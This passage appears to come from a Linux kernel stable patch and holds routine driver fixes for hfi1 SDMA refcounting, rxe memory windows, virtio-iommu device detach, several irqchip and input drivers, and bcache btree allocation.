+ static int add_mapping_to_sdma_packet(struct user_sdma_request *req,
+ 				      struct user_sdma_txreq *tx,
+ 				      struct sdma_mmu_node *cache_entry,
+@@ -1494,9 +1510,12 @@ static int add_mapping_to_sdma_packet(struct user_sdma_request *req,
+ 			ctx = cache_entry;
+ 		}
+ 
+-		ret = sdma_txadd_page(pq->dd, ctx, &tx->txreq,
++		ret = sdma_txadd_page(pq->dd, &tx->txreq,
+ 				      cache_entry->pages[page_index],
+-				      page_offset, from_this_page);
++				      page_offset, from_this_page,
++				      ctx,
++				      sdma_mmu_rb_node_get,
++				      sdma_mmu_rb_node_put);
+ 		if (ret) {
+ 			/*
+ 			 * When there's a failure, the entire request is freed by
+@@ -1518,8 +1537,6 @@ static int add_system_iovec_to_sdma_packet(struct user_sdma_request *req,
+ 					   struct user_sdma_iovec *iovec,
+ 					   size_t from_this_iovec)
+ {
+-	struct mmu_rb_handler *handler = req->pq->handler;
+-
+ 	while (from_this_iovec > 0) {
+ 		struct sdma_mmu_node *cache_entry;
+ 		size_t from_this_cache_entry;
+@@ -1540,15 +1557,15 @@ static int add_system_iovec_to_sdma_packet(struct user_sdma_request *req,
+ 
+ 		ret = add_mapping_to_sdma_packet(req, tx, cache_entry, start,
+ 						 from_this_cache_entry);
++
++		/*
++		 * Done adding cache_entry to zero or more sdma_desc. Can
++		 * kref_put() the "safety" kref taken under
++		 * get_system_cache_entry().
++		 */
++		kref_put(&cache_entry->rb.refcount, hfi1_mmu_rb_release);
++
+ 		if (ret) {
+-			/*
+-			 * We're guaranteed that there will be no descriptor
+-			 * completion callback that releases this node
+-			 * because only the last descriptor referencing it
+-			 * has a context attached, and a failure means the
+-			 * last descriptor was never added.
+-			 */
+-			release_node(handler, cache_entry);
+ 			SDMA_DBG(req, "add system segment failed %d", ret);
+ 			return ret;
+ 		}
+@@ -1599,42 +1616,12 @@ static int add_system_pages_to_sdma_packet(struct user_sdma_request *req,
+ 	return 0;
+ }
+ 
+-void system_descriptor_complete(struct hfi1_devdata *dd,
+-				struct sdma_desc *descp)
+-{
+-	switch (sdma_mapping_type(descp)) {
+-	case SDMA_MAP_SINGLE:
+-		dma_unmap_single(&dd->pcidev->dev, sdma_mapping_addr(descp),
+-				 sdma_mapping_len(descp), DMA_TO_DEVICE);
+-		break;
+-	case SDMA_MAP_PAGE:
+-		dma_unmap_page(&dd->pcidev->dev, sdma_mapping_addr(descp),
+-			       sdma_mapping_len(descp), DMA_TO_DEVICE);
+-		break;
+-	}
+-
+-	if (descp->pinning_ctx) {
+-		struct sdma_mmu_node *node = descp->pinning_ctx;
+-
+-		release_node(node->rb.handler, node);
+-	}
+-}
+-
+ static bool sdma_rb_filter(struct mmu_rb_node *node, unsigned long addr,
+ 			   unsigned long len)
+ {
+ 	return (bool)(node->addr == addr);
+ }
+ 
+-static int sdma_rb_insert(void *arg, struct mmu_rb_node *mnode)
+-{
+-	struct sdma_mmu_node *node =
+-		container_of(mnode, struct sdma_mmu_node, rb);
+-
+-	atomic_inc(&node->refcount);
+-	return 0;
+-}
+-
+ /*
+  * Return 1 to remove the node from the rb tree and call the remove op.
+  *
+@@ -1647,10 +1634,6 @@ static int sdma_rb_evict(void *arg, struct mmu_rb_node *mnode,
+ 		container_of(mnode, struct sdma_mmu_node, rb);
+ 	struct evict_data *evict_data = evict_arg;
+ 
+-	/* is this node still being used? */
+-	if (atomic_read(&node->refcount))
+-		return 0; /* keep this node */
+-
+ 	/* this node will be evicted, add its pages to our count */
+ 	evict_data->cleared += node->npages;
+ 
+@@ -1668,13 +1651,3 @@ static void sdma_rb_remove(void *arg, struct mmu_rb_node *mnode)
+ 
+ 	free_system_node(node);
+ }
+-
+-static int sdma_rb_invalidate(void *arg, struct mmu_rb_node *mnode)
+-{
+-	struct sdma_mmu_node *node =
+-		container_of(mnode, struct sdma_mmu_node, rb);
+-
+-	if (!atomic_read(&node->refcount))
+-		return 1;
+-	return 0;
+-}
+diff --git a/drivers/infiniband/hw/hfi1/user_sdma.h b/drivers/infiniband/hw/hfi1/user_sdma.h
+index a241836371dc1..548347d4c5bc2 100644
+--- a/drivers/infiniband/hw/hfi1/user_sdma.h
++++ b/drivers/infiniband/hw/hfi1/user_sdma.h
+@@ -104,7 +104,6 @@ struct hfi1_user_sdma_comp_q {
+ struct sdma_mmu_node {
+ 	struct mmu_rb_node rb;
+ 	struct hfi1_user_sdma_pkt_q *pq;
+-	atomic_t refcount;
+ 	struct page **pages;
+ 	unsigned int npages;
+ };
+diff --git a/drivers/infiniband/hw/hfi1/vnic_sdma.c b/drivers/infiniband/hw/hfi1/vnic_sdma.c
+index 727eedfba332a..cc6324d2d1ddc 100644
+--- a/drivers/infiniband/hw/hfi1/vnic_sdma.c
++++ b/drivers/infiniband/hw/hfi1/vnic_sdma.c
+@@ -64,11 +64,11 @@ static noinline int build_vnic_ulp_payload(struct sdma_engine *sde,
+ 
+ 		/* combine physically continuous fragments later? */
+ 		ret = sdma_txadd_page(sde->dd,
+-				      NULL,
+ 				      &tx->txreq,
+ 				      skb_frag_page(frag),
+ 				      skb_frag_off(frag),
+-				      skb_frag_size(frag));
++				      skb_frag_size(frag),
++				      NULL, NULL, NULL);
+ 		if (unlikely(ret))
+ 			goto bail_txadd;
+ 	}
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hem.c b/drivers/infiniband/hw/hns/hns_roce_hem.c
+index aa8a08d1c0145..f30274986c0da 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hem.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hem.c
+@@ -595,11 +595,12 @@ int hns_roce_table_get(struct hns_roce_dev *hr_dev,
+ 	}
+ 
+ 	/* Set HEM base address(128K/page, pa) to Hardware */
+-	if (hr_dev->hw->set_hem(hr_dev, table, obj, HEM_HOP_STEP_DIRECT)) {
++	ret = hr_dev->hw->set_hem(hr_dev, table, obj, HEM_HOP_STEP_DIRECT);
++	if (ret) {
+ 		hns_roce_free_hem(hr_dev, table->hem[i]);
+ 		table->hem[i] = NULL;
+-		ret = -ENODEV;
+-		dev_err(dev, "set HEM base address to HW failed.\n");
++		dev_err(dev, "set HEM base address to HW failed, ret = %d.\n",
++			ret);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/infiniband/hw/irdma/uk.c b/drivers/infiniband/hw/irdma/uk.c
+index 16183e894da77..dd428d915c175 100644
+--- a/drivers/infiniband/hw/irdma/uk.c
++++ b/drivers/infiniband/hw/irdma/uk.c
+@@ -93,16 +93,18 @@ static int irdma_nop_1(struct irdma_qp_uk *qp)
+  */
+ void irdma_clr_wqes(struct irdma_qp_uk *qp, u32 qp_wqe_idx)
+ {
+-	__le64 *wqe;
++	struct irdma_qp_quanta *sq;
+ 	u32 wqe_idx;
+ 
+ 	if (!(qp_wqe_idx & 0x7F)) {
+ 		wqe_idx = (qp_wqe_idx + 128) % qp->sq_ring.size;
+-		wqe = qp->sq_base[wqe_idx].elem;
++		sq = qp->sq_base + wqe_idx;
+ 		if (wqe_idx)
+-			memset(wqe, qp->swqe_polarity ? 0 : 0xFF, 0x1000);
++			memset(sq, qp->swqe_polarity ? 0 : 0xFF,
++			       128 * sizeof(*sq));
+ 		else
+-			memset(wqe, qp->swqe_polarity ? 0xFF : 0, 0x1000);
++			memset(sq, qp->swqe_polarity ? 0xFF : 0,
++			       128 * sizeof(*sq));
+ 	}
+ }
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe.h b/drivers/infiniband/sw/rxe/rxe.h
+index 30fbdf3bc76a3..ab334900fcc3d 100644
+--- a/drivers/infiniband/sw/rxe/rxe.h
++++ b/drivers/infiniband/sw/rxe/rxe.h
+@@ -38,6 +38,25 @@
+ 
+ #define RXE_ROCE_V2_SPORT		(0xc000)
+ 
++#define rxe_dbg(rxe, fmt, ...) ibdev_dbg(&(rxe)->ib_dev,		\
++		"%s: " fmt, __func__, ##__VA_ARGS__)
++#define rxe_dbg_uc(uc, fmt, ...) ibdev_dbg((uc)->ibuc.device,		\
++		"uc#%d %s: " fmt, (uc)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_dbg_pd(pd, fmt, ...) ibdev_dbg((pd)->ibpd.device,		\
++		"pd#%d %s: " fmt, (pd)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_dbg_ah(ah, fmt, ...) ibdev_dbg((ah)->ibah.device,		\
++		"ah#%d %s: " fmt, (ah)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_dbg_srq(srq, fmt, ...) ibdev_dbg((srq)->ibsrq.device,	\
++		"srq#%d %s: " fmt, (srq)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_dbg_qp(qp, fmt, ...) ibdev_dbg((qp)->ibqp.device,		\
++		"qp#%d %s: " fmt, (qp)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_dbg_cq(cq, fmt, ...) ibdev_dbg((cq)->ibcq.device,		\
++		"cq#%d %s: " fmt, (cq)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_dbg_mr(mr, fmt, ...) ibdev_dbg((mr)->ibmr.device,		\
++		"mr#%d %s:  " fmt, (mr)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_dbg_mw(mw, fmt, ...) ibdev_dbg((mw)->ibmw.device,		\
++		"mw#%d %s:  " fmt, (mw)->elem.index, __func__, ##__VA_ARGS__)
++
+ void rxe_set_mtu(struct rxe_dev *rxe, unsigned int dev_mtu);
+ 
+ int rxe_add(struct rxe_dev *rxe, unsigned int mtu, const char *ibdev_name);
+diff --git a/drivers/infiniband/sw/rxe/rxe_mw.c b/drivers/infiniband/sw/rxe/rxe_mw.c
+index 902b7df7aaedb..cebc9f0f428d8 100644
+--- a/drivers/infiniband/sw/rxe/rxe_mw.c
++++ b/drivers/infiniband/sw/rxe/rxe_mw.c
+@@ -48,18 +48,18 @@ int rxe_dealloc_mw(struct ib_mw *ibmw)
+ }
+ 
+ static int rxe_check_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe,
+-			 struct rxe_mw *mw, struct rxe_mr *mr)
++			 struct rxe_mw *mw, struct rxe_mr *mr, int access)
+ {
+ 	if (mw->ibmw.type == IB_MW_TYPE_1) {
+ 		if (unlikely(mw->state != RXE_MW_STATE_VALID)) {
+-			pr_err_once(
++			rxe_dbg_mw(mw,
+ 				"attempt to bind a type 1 MW not in the valid state\n");
+ 			return -EINVAL;
+ 		}
+ 
+ 		/* o10-36.2.2 */
+-		if (unlikely((mw->access & IB_ZERO_BASED))) {
+-			pr_err_once("attempt to bind a zero based type 1 MW\n");
++		if (unlikely((access & IB_ZERO_BASED))) {
++			rxe_dbg_mw(mw, "attempt to bind a zero based type 1 MW\n");
+ 			return -EINVAL;
+ 		}
+ 	}
+@@ -67,21 +67,21 @@ static int rxe_check_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe,
+ 	if (mw->ibmw.type == IB_MW_TYPE_2) {
+ 		/* o10-37.2.30 */
+ 		if (unlikely(mw->state != RXE_MW_STATE_FREE)) {
+-			pr_err_once(
++			rxe_dbg_mw(mw,
+ 				"attempt to bind a type 2 MW not in the free state\n");
+ 			return -EINVAL;
+ 		}
+ 
+ 		/* C10-72 */
+ 		if (unlikely(qp->pd != to_rpd(mw->ibmw.pd))) {
+-			pr_err_once(
++			rxe_dbg_mw(mw,
+ 				"attempt to bind type 2 MW with qp with different PD\n");
+ 			return -EINVAL;
+ 		}
+ 
+ 		/* o10-37.2.40 */
+ 		if (unlikely(!mr || wqe->wr.wr.mw.length == 0)) {
+-			pr_err_once(
++			rxe_dbg_mw(mw,
+ 				"attempt to invalidate type 2 MW by binding with NULL or zero length MR\n");
+ 			return -EINVAL;
+ 		}
+@@ -92,30 +92,30 @@ static int rxe_check_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe,
+ 		return 0;
+ 
+ 	if (unlikely(mr->access & IB_ZERO_BASED)) {
+-		pr_err_once("attempt to bind MW to zero based MR\n");
++		rxe_dbg_mw(mw, "attempt to bind MW to zero based MR\n");
+ 		return -EINVAL;
+ 	}
+ 
+ 	/* C10-73 */
+ 	if (unlikely(!(mr->access & IB_ACCESS_MW_BIND))) {
+-		pr_err_once(
++		rxe_dbg_mw(mw,
+ 			"attempt to bind an MW to an MR without bind access\n");
+ 		return -EINVAL;
+ 	}
+ 
+ 	/* C10-74 */
+-	if (unlikely((mw->access &
++	if (unlikely((access &
+ 		      (IB_ACCESS_REMOTE_WRITE | IB_ACCESS_REMOTE_ATOMIC)) &&
+ 		     !(mr->access & IB_ACCESS_LOCAL_WRITE))) {
+-		pr_err_once(
++		rxe_dbg_mw(mw,
+ 			"attempt to bind an Writable MW to an MR without local write access\n");
+ 		return -EINVAL;
+ 	}
+ 
+ 	/* C10-75 */
+-	if (mw->access & IB_ZERO_BASED) {
++	if (access & IB_ZERO_BASED) {
+ 		if (unlikely(wqe->wr.wr.mw.length > mr->ibmr.length)) {
+-			pr_err_once(
++			rxe_dbg_mw(mw,
+ 				"attempt to bind a ZB MW outside of the MR\n");
+ 			return -EINVAL;
+ 		}
+@@ -123,7 +123,7 @@ static int rxe_check_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe,
+ 		if (unlikely((wqe->wr.wr.mw.addr < mr->ibmr.iova) ||
+ 			     ((wqe->wr.wr.mw.addr + wqe->wr.wr.mw.length) >
+ 			      (mr->ibmr.iova + mr->ibmr.length)))) {
+-			pr_err_once(
++			rxe_dbg_mw(mw,
+ 				"attempt to bind a VA MW outside of the MR\n");
+ 			return -EINVAL;
+ 		}
+@@ -133,12 +133,12 @@ static int rxe_check_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe,
+ }
+ 
+ static void rxe_do_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe,
+-		      struct rxe_mw *mw, struct rxe_mr *mr)
++		      struct rxe_mw *mw, struct rxe_mr *mr, int access)
+ {
+ 	u32 key = wqe->wr.wr.mw.rkey & 0xff;
+ 
+ 	mw->rkey = (mw->rkey & ~0xff) | key;
+-	mw->access = wqe->wr.wr.mw.access;
++	mw->access = access;
+ 	mw->state = RXE_MW_STATE_VALID;
+ 	mw->addr = wqe->wr.wr.mw.addr;
+ 	mw->length = wqe->wr.wr.mw.length;
+@@ -169,6 +169,7 @@ int rxe_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe)
+ 	struct rxe_dev *rxe = to_rdev(qp->ibqp.device);
+ 	u32 mw_rkey = wqe->wr.wr.mw.mw_rkey;
+ 	u32 mr_lkey = wqe->wr.wr.mw.mr_lkey;
++	int access = wqe->wr.wr.mw.access;
+ 
+ 	mw = rxe_pool_get_index(&rxe->mw_pool, mw_rkey >> 8);
+ 	if (unlikely(!mw)) {
+@@ -198,11 +199,11 @@ int rxe_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe)
+ 
+ 	spin_lock_bh(&mw->lock);
+ 
+-	ret = rxe_check_bind_mw(qp, wqe, mw, mr);
++	ret = rxe_check_bind_mw(qp, wqe, mw, mr, access);
+ 	if (ret)
+ 		goto err_unlock;
+ 
+-	rxe_do_bind_mw(qp, wqe, mw, mr);
++	rxe_do_bind_mw(qp, wqe, mw, mr, access);
+ err_unlock:
+ 	spin_unlock_bh(&mw->lock);
+ err_drop_mr:
+diff --git a/drivers/input/misc/adxl34x.c b/drivers/input/misc/adxl34x.c
+index a4af314392a9f..69e359ff51805 100644
+--- a/drivers/input/misc/adxl34x.c
++++ b/drivers/input/misc/adxl34x.c
+@@ -811,8 +811,7 @@ struct adxl34x *adxl34x_probe(struct device *dev, int irq,
+ 	AC_WRITE(ac, POWER_CTL, 0);
+ 
+ 	err = request_threaded_irq(ac->irq, NULL, adxl34x_irq,
+-				   IRQF_TRIGGER_HIGH | IRQF_ONESHOT,
+-				   dev_name(dev), ac);
++				   IRQF_ONESHOT, dev_name(dev), ac);
+ 	if (err) {
+ 		dev_err(dev, "irq %d busy?\n", ac->irq);
+ 		goto err_free_mem;
+diff --git a/drivers/input/misc/drv260x.c b/drivers/input/misc/drv260x.c
+index 0efe56f49aa94..1923924fdd444 100644
+--- a/drivers/input/misc/drv260x.c
++++ b/drivers/input/misc/drv260x.c
+@@ -435,6 +435,7 @@ static int drv260x_init(struct drv260x_data *haptics)
+ 	}
+ 
+ 	do {
++		usleep_range(15000, 15500);
+ 		error = regmap_read(haptics->regmap, DRV260X_GO, &cal_buf);
+ 		if (error) {
+ 			dev_err(&haptics->client->dev,
+diff --git a/drivers/input/misc/pm8941-pwrkey.c b/drivers/input/misc/pm8941-pwrkey.c
+index 549df01b6ee33..5dd68a02c4451 100644
+--- a/drivers/input/misc/pm8941-pwrkey.c
++++ b/drivers/input/misc/pm8941-pwrkey.c
+@@ -50,7 +50,10 @@
+ #define  PON_RESIN_PULL_UP		BIT(0)
+ 
+ #define PON_DBC_CTL			0x71
+-#define  PON_DBC_DELAY_MASK		0x7
++#define  PON_DBC_DELAY_MASK_GEN1	0x7
++#define  PON_DBC_DELAY_MASK_GEN2	0xf
++#define  PON_DBC_SHIFT_GEN1		6
++#define  PON_DBC_SHIFT_GEN2		14
+ 
+ struct pm8941_data {
+ 	unsigned int	pull_up_bit;
+@@ -247,7 +250,7 @@ static int pm8941_pwrkey_probe(struct platform_device *pdev)
+ 	struct device *parent;
+ 	struct device_node *regmap_node;
+ 	const __be32 *addr;
+-	u32 req_delay;
++	u32 req_delay, mask, delay_shift;
+ 	int error;
+ 
+ 	if (of_property_read_u32(pdev->dev.of_node, "debounce", &req_delay))
+@@ -336,12 +339,20 @@ static int pm8941_pwrkey_probe(struct platform_device *pdev)
+ 	pwrkey->input->phys = pwrkey->data->phys;
+ 
+ 	if (pwrkey->data->supports_debounce_config) {
+-		req_delay = (req_delay << 6) / USEC_PER_SEC;
++		if (pwrkey->subtype >= PON_SUBTYPE_GEN2_PRIMARY) {
++			mask = PON_DBC_DELAY_MASK_GEN2;
++			delay_shift = PON_DBC_SHIFT_GEN2;
++		} else {
++			mask = PON_DBC_DELAY_MASK_GEN1;
++			delay_shift = PON_DBC_SHIFT_GEN1;
++		}
++
++		req_delay = (req_delay << delay_shift) / USEC_PER_SEC;
+ 		req_delay = ilog2(req_delay);
+ 
+ 		error = regmap_update_bits(pwrkey->regmap,
+ 					   pwrkey->baseaddr + PON_DBC_CTL,
+-					   PON_DBC_DELAY_MASK,
++					   mask,
+ 					   req_delay);
+ 		if (error) {
+ 			dev_err(&pdev->dev, "failed to set debounce: %d\n",
+diff --git a/drivers/iommu/virtio-iommu.c b/drivers/iommu/virtio-iommu.c
+index 8b1b5c270e502..fd86ccb709ec5 100644
+--- a/drivers/iommu/virtio-iommu.c
++++ b/drivers/iommu/virtio-iommu.c
+@@ -789,6 +789,29 @@ static int viommu_attach_dev(struct iommu_domain *domain, struct device *dev)
+ 	return 0;
+ }
+ 
++static void viommu_detach_dev(struct viommu_endpoint *vdev)
++{
++	int i;
++	struct virtio_iommu_req_detach req;
++	struct viommu_domain *vdomain = vdev->vdomain;
++	struct iommu_fwspec *fwspec = dev_iommu_fwspec_get(vdev->dev);
++
++	if (!vdomain)
++		return;
++
++	req = (struct virtio_iommu_req_detach) {
++		.head.type	= VIRTIO_IOMMU_T_DETACH,
++		.domain		= cpu_to_le32(vdomain->id),
++	};
++
++	for (i = 0; i < fwspec->num_ids; i++) {
++		req.endpoint = cpu_to_le32(fwspec->ids[i]);
++		WARN_ON(viommu_send_req_sync(vdev->viommu, &req, sizeof(req)));
++	}
++	vdomain->nr_endpoints--;
++	vdev->vdomain = NULL;
++}
++
+ static int viommu_map_pages(struct iommu_domain *domain, unsigned long iova,
+ 			    phys_addr_t paddr, size_t pgsize, size_t pgcount,
+ 			    int prot, gfp_t gfp, size_t *mapped)
+@@ -811,25 +834,26 @@ static int viommu_map_pages(struct iommu_domain *domain, unsigned long iova,
+ 	if (ret)
+ 		return ret;
+ 
+-	map = (struct virtio_iommu_req_map) {
+-		.head.type	= VIRTIO_IOMMU_T_MAP,
+-		.domain		= cpu_to_le32(vdomain->id),
+-		.virt_start	= cpu_to_le64(iova),
+-		.phys_start	= cpu_to_le64(paddr),
+-		.virt_end	= cpu_to_le64(end),
+-		.flags		= cpu_to_le32(flags),
+-	};
+-
+-	if (!vdomain->nr_endpoints)
+-		return 0;
++	if (vdomain->nr_endpoints) {
++		map = (struct virtio_iommu_req_map) {
++			.head.type	= VIRTIO_IOMMU_T_MAP,
++			.domain		= cpu_to_le32(vdomain->id),
++			.virt_start	= cpu_to_le64(iova),
++			.phys_start	= cpu_to_le64(paddr),
++			.virt_end	= cpu_to_le64(end),
++			.flags		= cpu_to_le32(flags),
++		};
+ 
+-	ret = viommu_send_req_sync(vdomain->viommu, &map, sizeof(map));
+-	if (ret)
+-		viommu_del_mappings(vdomain, iova, end);
+-	else if (mapped)
++		ret = viommu_send_req_sync(vdomain->viommu, &map, sizeof(map));
++		if (ret) {
++			viommu_del_mappings(vdomain, iova, end);
++			return ret;
++		}
++	}
++	if (mapped)
+ 		*mapped = size;
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static size_t viommu_unmap_pages(struct iommu_domain *domain, unsigned long iova,
+@@ -991,6 +1015,7 @@ static void viommu_release_device(struct device *dev)
+ {
+ 	struct viommu_endpoint *vdev = dev_iommu_priv_get(dev);
+ 
++	viommu_detach_dev(vdev);
+ 	iommu_put_resv_regions(dev, &vdev->resv_regions);
+ 	kfree(vdev);
+ }
+diff --git a/drivers/irqchip/irq-jcore-aic.c b/drivers/irqchip/irq-jcore-aic.c
+index 5f47d8ee4ae39..b9dcc8e78c750 100644
+--- a/drivers/irqchip/irq-jcore-aic.c
++++ b/drivers/irqchip/irq-jcore-aic.c
+@@ -68,6 +68,7 @@ static int __init aic_irq_of_init(struct device_node *node,
+ 	unsigned min_irq = JCORE_AIC2_MIN_HWIRQ;
+ 	unsigned dom_sz = JCORE_AIC_MAX_HWIRQ+1;
+ 	struct irq_domain *domain;
++	int ret;
+ 
+ 	pr_info("Initializing J-Core AIC\n");
+ 
+@@ -100,6 +101,12 @@ static int __init aic_irq_of_init(struct device_node *node,
+ 	jcore_aic.irq_unmask = noop;
+ 	jcore_aic.name = "AIC";
+ 
++	ret = irq_alloc_descs(-1, min_irq, dom_sz - min_irq,
++			      of_node_to_nid(node));
++
++	if (ret < 0)
++		return ret;
++
+ 	domain = irq_domain_add_legacy(node, dom_sz - min_irq, min_irq, min_irq,
+ 				       &jcore_aic_irqdomain_ops,
+ 				       &jcore_aic);
+diff --git a/drivers/irqchip/irq-loongson-pch-pic.c b/drivers/irqchip/irq-loongson-pch-pic.c
+index 679e2b68e6e9d..5839395099d66 100644
+--- a/drivers/irqchip/irq-loongson-pch-pic.c
++++ b/drivers/irqchip/irq-loongson-pch-pic.c
+@@ -162,7 +162,7 @@ static int pch_pic_domain_translate(struct irq_domain *d,
+ 		if (fwspec->param_count < 2)
+ 			return -EINVAL;
+ 
+-		*hwirq = fwspec->param[0] + priv->ht_vec_base;
++		*hwirq = fwspec->param[0];
+ 		*type = fwspec->param[1] & IRQ_TYPE_SENSE_MASK;
+ 	} else {
+ 		*hwirq = fwspec->param[0] - priv->gsi_base;
+@@ -188,7 +188,7 @@ static int pch_pic_alloc(struct irq_domain *domain, unsigned int virq,
+ 
+ 	parent_fwspec.fwnode = domain->parent->fwnode;
+ 	parent_fwspec.param_count = 1;
+-	parent_fwspec.param[0] = hwirq;
++	parent_fwspec.param[0] = hwirq + priv->ht_vec_base;
+ 
+ 	err = irq_domain_alloc_irqs_parent(domain, virq, 1, &parent_fwspec);
+ 	if (err)
+@@ -350,14 +350,12 @@ static int __init acpi_cascade_irqdomain_init(void)
+ int __init pch_pic_acpi_init(struct irq_domain *parent,
+ 					struct acpi_madt_bio_pic *acpi_pchpic)
+ {
+-	int ret, vec_base;
++	int ret;
+ 	struct fwnode_handle *domain_handle;
+ 
+ 	if (find_pch_pic(acpi_pchpic->gsi_base) >= 0)
+ 		return 0;
+ 
+-	vec_base = acpi_pchpic->gsi_base - GSI_MIN_PCH_IRQ;
+-
+ 	domain_handle = irq_domain_alloc_fwnode(&acpi_pchpic->address);
+ 	if (!domain_handle) {
+ 		pr_err("Unable to allocate domain handle\n");
+@@ -365,7 +363,7 @@ int __init pch_pic_acpi_init(struct irq_domain *parent,
+ 	}
+ 
+ 	ret = pch_pic_init(acpi_pchpic->address, acpi_pchpic->size,
+-				vec_base, parent, domain_handle, acpi_pchpic->gsi_base);
++				0, parent, domain_handle, acpi_pchpic->gsi_base);
+ 
+ 	if (ret < 0) {
+ 		irq_domain_free_fwnode(domain_handle);
+diff --git a/drivers/irqchip/irq-stm32-exti.c b/drivers/irqchip/irq-stm32-exti.c
+index 6a3f7498ea8ea..8bbb2b114636c 100644
+--- a/drivers/irqchip/irq-stm32-exti.c
++++ b/drivers/irqchip/irq-stm32-exti.c
+@@ -173,6 +173,16 @@ static struct irq_chip stm32_exti_h_chip_direct;
+ #define EXTI_INVALID_IRQ       U8_MAX
+ #define STM32MP1_DESC_IRQ_SIZE (ARRAY_SIZE(stm32mp1_exti_banks) * IRQS_PER_BANK)
+ 
++/*
++ * Use some intentionally tricky logic here to initialize the whole array to
++ * EXTI_INVALID_IRQ, but then override certain fields, requiring us to indicate
++ * that we "know" that there are overrides in this structure, and we'll need to
++ * disable that warning from W=1 builds.
++ */
++__diag_push();
++__diag_ignore_all("-Woverride-init",
++		  "logic to initialize all and then override some is OK");
++
+ static const u8 stm32mp1_desc_irq[] = {
+ 	/* default value */
+ 	[0 ... (STM32MP1_DESC_IRQ_SIZE - 1)] = EXTI_INVALID_IRQ,
+@@ -266,6 +276,8 @@ static const u8 stm32mp13_desc_irq[] = {
+ 	[70] = 98,
+ };
+ 
++__diag_pop();
++
+ static const struct stm32_exti_drv_data stm32mp1_drv_data = {
+ 	.exti_banks = stm32mp1_exti_banks,
+ 	.bank_nr = ARRAY_SIZE(stm32mp1_exti_banks),
+diff --git a/drivers/leds/trigger/ledtrig-netdev.c b/drivers/leds/trigger/ledtrig-netdev.c
+index d5e774d830215..f4d670ec30bcb 100644
+--- a/drivers/leds/trigger/ledtrig-netdev.c
++++ b/drivers/leds/trigger/ledtrig-netdev.c
+@@ -318,6 +318,9 @@ static int netdev_trig_notify(struct notifier_block *nb,
+ 	clear_bit(NETDEV_LED_MODE_LINKUP, &trigger_data->mode);
+ 	switch (evt) {
+ 	case NETDEV_CHANGENAME:
++		if (netif_carrier_ok(dev))
++			set_bit(NETDEV_LED_MODE_LINKUP, &trigger_data->mode);
++		fallthrough;
+ 	case NETDEV_REGISTER:
+ 		if (trigger_data->net_dev)
+ 			dev_put(trigger_data->net_dev);
+diff --git a/drivers/mailbox/ti-msgmgr.c b/drivers/mailbox/ti-msgmgr.c
+index ddac423ac1a91..03048cbda525e 100644
+--- a/drivers/mailbox/ti-msgmgr.c
++++ b/drivers/mailbox/ti-msgmgr.c
+@@ -430,14 +430,20 @@ static int ti_msgmgr_send_data(struct mbox_chan *chan, void *data)
+ 		/* Ensure all unused data is 0 */
+ 		data_trail &= 0xFFFFFFFF >> (8 * (sizeof(u32) - trail_bytes));
+ 		writel(data_trail, data_reg);
+-		data_reg++;
++		data_reg += sizeof(u32);
+ 	}
++
+ 	/*
+ 	 * 'data_reg' indicates next register to write. If we did not already
+ 	 * write on tx complete reg(last reg), we must do so for transmit
++	 * In addition, we also need to make sure all intermediate data
++	 * registers(if any required), are reset to 0 for TISCI backward
++	 * compatibility to be maintained.
+ 	 */
+-	if (data_reg <= qinst->queue_buff_end)
+-		writel(0, qinst->queue_buff_end);
++	while (data_reg <= qinst->queue_buff_end) {
++		writel(0, data_reg);
++		data_reg += sizeof(u32);
++	}
+ 
+ 	/* If we are in polled mode, wait for a response before proceeding */
+ 	if (ti_msgmgr_chan_has_polled_queue_rx(message->chan_rx))
+diff --git a/drivers/md/bcache/btree.c b/drivers/md/bcache/btree.c
+index 147c493a989a5..68b9d7ca864e2 100644
+--- a/drivers/md/bcache/btree.c
++++ b/drivers/md/bcache/btree.c
+@@ -885,7 +885,7 @@ static struct btree *mca_cannibalize(struct cache_set *c, struct btree_op *op,
+  * cannibalize_bucket() will take. This means every time we unlock the root of
+  * the btree, we need to release this lock if we have it held.
+  */
+-static void bch_cannibalize_unlock(struct cache_set *c)
++void bch_cannibalize_unlock(struct cache_set *c)
+ {
+ 	spin_lock(&c->btree_cannibalize_lock);
+ 	if (c->btree_cache_alloc_lock == current) {
+@@ -1090,10 +1090,12 @@ struct btree *__bch_btree_node_alloc(struct cache_set *c, struct btree_op *op,
+ 				     struct btree *parent)
+ {
+ 	BKEY_PADDED(key) k;
+-	struct btree *b = ERR_PTR(-EAGAIN);
++	struct btree *b;
+ 
+ 	mutex_lock(&c->bucket_lock);
+ retry:
++	/* return ERR_PTR(-EAGAIN) when it fails */
++	b = ERR_PTR(-EAGAIN);
+ 	if (__bch_bucket_alloc_set(c, RESERVE_BTREE, &k.key, wait))
+ 		goto err;
+ 
+@@ -1138,7 +1140,7 @@ static struct btree *btree_node_alloc_replacement(struct btree *b,
+ {
+ 	struct btree *n = bch_btree_node_alloc(b->c, op, b->level, b->parent);
+ 
+-	if (!IS_ERR_OR_NULL(n)) {
++	if (!IS_ERR(n)) {
+ 		mutex_lock(&n->write_lock);
+ 		bch_btree_sort_into(&b->keys, &n->keys, &b->c->sort);
+ 		bkey_copy_key(&n->key, &b->key);
+@@ -1340,7 +1342,7 @@ static int btree_gc_coalesce(struct btree *b, struct btree_op *op,
+ 	memset(new_nodes, 0, sizeof(new_nodes));
+ 	closure_init_stack(&cl);
+ 
+-	while (nodes < GC_MERGE_NODES && !IS_ERR_OR_NULL(r[nodes].b))
